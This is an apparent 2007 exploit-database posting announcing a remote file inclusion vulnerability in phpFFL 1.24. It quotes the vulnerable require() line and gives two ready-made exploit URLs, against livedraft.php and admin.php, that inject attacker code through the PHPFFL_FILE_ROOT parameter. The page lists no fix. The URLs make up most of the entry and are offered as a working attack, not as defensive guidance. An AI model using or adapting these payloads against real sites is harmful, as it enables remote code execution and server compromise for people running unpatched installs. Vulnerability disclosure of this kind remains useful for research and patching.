phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities

2007-09-14 00:00:00

*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
*******************************************************************************
# Title : phpFFL 1.24 Remote File Inclusion Vulnerability
# Author : Dj7xpl
# Contact : [email protected]
# Dawnload : http://sourceforge.net/project/showfiles.php?group_id=137531
# Gr33tZ : Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");


[[Remote]]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.